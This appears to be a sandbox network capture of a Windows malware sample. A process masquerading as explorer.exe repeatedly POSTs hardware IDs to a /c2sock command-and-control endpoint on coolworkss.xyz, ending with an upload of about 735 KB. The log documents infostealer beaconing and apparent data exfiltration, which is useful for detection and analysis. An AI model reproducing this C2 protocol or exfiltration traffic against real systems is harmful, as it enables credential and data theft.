Sep 5, 2023 13:02:46.380932093 CEST	2858	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=nb6f4pddq7cc7jk6b2hivdual4; expires=Sat, 30 Dec 2023 04:49:25 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ngEum6q%2FBslfzGFq%2FOAy%2Fl0RM0kQHcV6vpdu1iDWA%2B%2B1GAPEPeCeY2s9Q8pc23eSNtbKpMGomO90vwqFxY22D4HgKQ%2FcwD5b%2BfLTdJEGxCr85dxlD35d7iz%2F%2BWNBI2AJYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb59ab49572a-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:46.381072998 CEST	2858	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49737	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:23.053628922 CEST	2756	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: TeslaBrowser/5.5 Host: coolworkss.xyz
Sep 5, 2023 13:02:23.431405067 CEST	2757	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:23 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Sat, 01 Jul 2023 17:37:18 GMT Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xAjjPYBv7f02bcTnmOaDXOg4TVMRVz6g14oAfLvZznOLEwrteCk8C6IjIvhPbM%2BTFkmz9eBNf6tn7hyzfGmzJcokksnHNdtbxEiz%2BUBgro1emV6f9X0MbSDnewubo4%2FxxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfaca7eae9ae9-MIA Data Raw: 61 31 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 95 d1 81 d0 b5 d0 bd d0 b8 d0 bd 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 69 6d 67 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 6c 65 66 74 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 72 75 73 74 69 68 2e 72 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 35 2f 31 32 2f 73 65 72 67 65 79 2d 65 73 65 6e 69 6e 2d 73 74 69 68 69 2d 32 30 37 78 33 30 30 2e 6a 70 67 22 2f 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 20 31 35 70 78 3b 77 69 64 74 68 3a 20 36 30 30 70 78 3b 22 3e 0a 20 20 20 20 3c 68 31 3e d0 a1 d0 b5 d1 80 d0 b3 d0 b5 d0 b9 20 d0 95 d1 81 d0 b5 d0 bd d0 b8 d0 bd 20 e2 80 94 20 d0 a2 d1 8b 20 d0 bc d0 b5 d0 bd d1 8f 20 d0 bd d0 b5 20 d0 bb d1 8e d0 b1 d0 b8 d1 88 d1 8c 2c 20 d0 bd d0 b5 20 d0 b6 d0 b0 d0 bb d0 b5 d0 b5 d1 88 d1 8c 3c 2f 68 31 3e 0a 3c 62 72 3e 3c 2f 62 72 3e 20 20 20 20 0a d0 a2 d1 8b 20 d0 bc d0 b5 d0 bd d1 8f 20 d0 bd d0 b5 20 d0 bb d1 8e d0 b1 d0 b8 d1 88 d1 8c 2c 20 d0 bd d0 b5 20 d0 b6 d0 b0 d0 bb d0 b5 d0 b5 d1 88 d1 8c 2c 0a d0 a0 d0 b0 d0 b7 d0 b2 d0 b5 20 d1 8f 20 d0 bd d0 b5 d0 bc d0 bd d0 be d0 b3 d0 be 20 d0 bd d0 b5 20 d0 ba d1 80 d0 b0 d1 81 d0 b8 d0 b2 3f 0a d0 9d d0 b5 20 d1 81 d0 bc d0 be d1 82 d1 80 d1 8f 20 d0 b2 20 d0 bb d0 b8 d1 86 d0 be 2c 20 d0 be d1 82 20 d1 81 d1 82 d1 80 d0 b0 d1 81 d1 82 d0 b8 20 d0 bc d0 bb d0 b5 d0 b5 d1 88 d1 8c 2c 0a d0 9c d0 bd d0 b5 20 d0 bd d0 b0 20 d0 bf d0 bb d0 b5 d1 87 d0 b8 20 d1 80 d1 Data Ascii: a11<!DOCTYPE html><meta charset="UTF-8"><html><head> <title></title> <style type="text/css"> *{ margin: 0; padding: 0; } </style></head><body><img style="float:left;" src="https://rustih.ru/wp-content/uploads/2015/12/sergey-esenin-stihi-207x300.jpg"/><div style="float: left;margin: 15px;width: 600px;"> <h1> , </h1><br></br> , , ? , ,
Sep 5, 2023 13:02:23.431504965 CEST	2758	IN	Data Raw: 83 d0 ba d0 b8 20 d0 be d0 bf d1 83 d1 81 d1 82 d0 b8 d0 b2 2e 0a 3c 62 72 3e 3c 2f 62 72 3e 0a d0 9c d0 be d0 bb d0 be d0 b4 d0 b0 d1 8f 2c 20 d1 81 20 d1 87 d1 83 d0 b2 d1 81 d1 82 d0 b2 d0 b5 d0 bd d0 bd d1 8b d0 bc 20 d0 be d1 81 d0 ba d0 b0 Data Ascii: .<br></br>, , . , ?
Sep 5, 2023 13:02:23.431525946 CEST	2759	IN	Data Raw: d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 2c 20 d1 8f 20 d0 b2 d1 8b d0 b9 d0 b4 d1 83 20 d0 bd d0 b0 20 d0 bf d1 80 d0 be d0 b3 d1 83 d0 bb d0 ba d1 83 2c 0a d0 98 20 d1 81 20 d1 82 d0 be d0 b1 d0 be d1 8e 20 d0 b2 d1 81 d1 82 d1 80 d0 Data Ascii: , , .<br></br> ,
Sep 5, 2023 13:02:23.431546926 CEST	2759	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.4	49764	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:46.712899923 CEST	2859	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:46.714171886 CEST	2860	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:47.141078949 CEST	2860	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=j76gsi6t2gdcvfqgav7frob290; expires=Sat, 30 Dec 2023 04:49:25 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fqZI4Vi4J5H3VJHujZ6N%2BZfxrOySrDnPzIwzZ5DyFZcRcFW%2FaKjDO%2BSYqLxEJu915bNzmU%2FAfmD8jIHe5K8t0pYDymU6xrF0D008eVLJZejcIuOSu14laC9gKkl0p3f7tQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb5e5928031c-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:47.141140938 CEST	2861	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.4	49765	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:47.441241980 CEST	2861	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:47.443515062 CEST	2862	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:47.918494940 CEST	2863	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=737lrrh8lveic79dbtmko0afmg; expires=Sat, 30 Dec 2023 04:49:26 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vS0AzCa%2F%2Bcrwu89RDWc%2BY7zOMHLWBm6rbYvyaflO%2F04tQOKY%2B2r9YY1vaJ0TtWGBaMBiOF3IhxY%2FCAuw%2B48ydsWsgtC56He9EY6eHYJFZ4ZUgpoBtBSFKtmu1IRi7NjwQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb62e93b287e-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:47.918539047 CEST	2863	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.4	49766	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:03.401012897 CEST	2864	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:03.403244972 CEST	2864	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:03.799978018 CEST	2865	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=73g817df6egcef86qu9m3112pq; expires=Sat, 30 Dec 2023 04:49:42 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oAiHoT%2BWxQpQA2636vtu02kRORzmFERCHhKCffxf7kAXesHxi23gGeJYZ%2FlRtI6Sw0rCFX9hmsLmmeuAecWOj9pwAC3TXTMlu3EPtC0qnObo89ZsP45B9e2zfMVsMmbe4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbc6adabd9a1-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:03.800081968 CEST	2865	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.4	49767	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:04.133225918 CEST	2866	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:04.133985043 CEST	2867	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:04.532296896 CEST	2868	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=0pnhd9tu7n4d9mo3juefkqsijh; expires=Sat, 30 Dec 2023 04:49:43 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sY2tOp6jsRecML4YMCHBMpZfg1hofb4moNbxj70MP9bBoluYUxA%2BunKg%2B6wIqAEApkC9k%2FJTdTia8OAle7pgDNsJK9xGfiAAm7t8f0r%2FJYavvb9%2FfS4oo2W3K8sGCHqd5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbcb3df92281-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:04.532325983 CEST	2868	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.4	49768	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:04.987086058 CEST	2868	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:04.988643885 CEST	2869	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:05.386718988 CEST	2870	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=6d4aqse7cjcev5sc0iih88sug0; expires=Sat, 30 Dec 2023 04:49:44 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NC2nuUO%2FPgtX3vc5VATxgGa0c5TzuYgTkxq8cuNSPZwT2Q0qHdrUuZeSDRj1ZS89K7coXrIYjo3h9QR7KxBb6lEZ5lLv6EyzkuYfQQ9tgG%2Bmq935qxnBzfsk2WGHDoVbow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbd0987667c9-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:05.386756897 CEST	2870	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.4	49769	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:06.024326086 CEST	2871	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:06.025150061 CEST	2871	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:06.424838066 CEST	2872	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=mp890ta9v6l7eknrolh8485oru; expires=Sat, 30 Dec 2023 04:49:45 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9TaZWJnNAH4CJID0UyiKocqyT%2BrjTlLkvUHOlWyLF%2BkYLljOJW5sbHEREoCN3mQlnMbO3vdiBakKx7Q4%2BCo6MrQ3psTpFox4LaF2ATjUxG2vDdxWsCIP6VAFzhfcYdr3LQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbd70ea93359-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:06.424885035 CEST	2872	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.4	49770	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:07.853878021 CEST	2873	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:07.854650021 CEST	2873	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:08.239799976 CEST	2874	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ejbedjltm0lrhg96j274kke78s; expires=Sat, 30 Dec 2023 04:49:47 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WU%2Bfmfn0sa3ftNCt5dn68Rz8MxkU8xL0JiRZR2BM0RCnPR95FWUJmlfR7%2Bm9ob75olVNZDNzTPjKwutFrpt2vrq4T7JNDd7wpZKNNnqsVzAeKHtxrAxFhYyTwbGUVsJhOQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbe278c26dc8-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:08.239861965 CEST	2874	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.4	49771	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:08.559906006 CEST	2875	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:08.560960054 CEST	2875	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:08.966351986 CEST	2876	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=n2kt6j521vfpf56e35s06ag24c; expires=Sat, 30 Dec 2023 04:49:47 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2EGC1XGwfI%2Fbb0EqDhKjD6QZZwggZeFcHiKS7%2FxVQ1zsTFFakOZEF08twCglCktzlPYjB%2FfaPLsXJA980iAzgOeEyjthHx87YjyA%2BXhfn5tQqazkQGWP8jdi%2BFAfDAbpdQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbe6e88f8dd9-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:08.966384888 CEST	2876	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.4	49772	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:09.257374048 CEST	2877	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:03:09.259506941 CEST	2878	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:03:09.704988956 CEST	2879	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=v67564ktlgd3l0n89ll2usqhvj; expires=Sat, 30 Dec 2023 04:49:48 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZfmwxFfZAL%2BZtmsN6Fa7tbN0bCVZyE01OPgGC5bu1v1xuZE7VbktxBQOWHoNbqPjYoW1PPdPm3srtpucdgD590aj1O2B472%2FFgDO1DmCt7fLXX0UMOHeb9qJqeK%2Bb1zOuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfbeb49d12206-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:03:09.705065012 CEST	2879	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.4	49773	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:03:10.610208988 CEST	2879	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 735829 Host: coolworkss.xyz
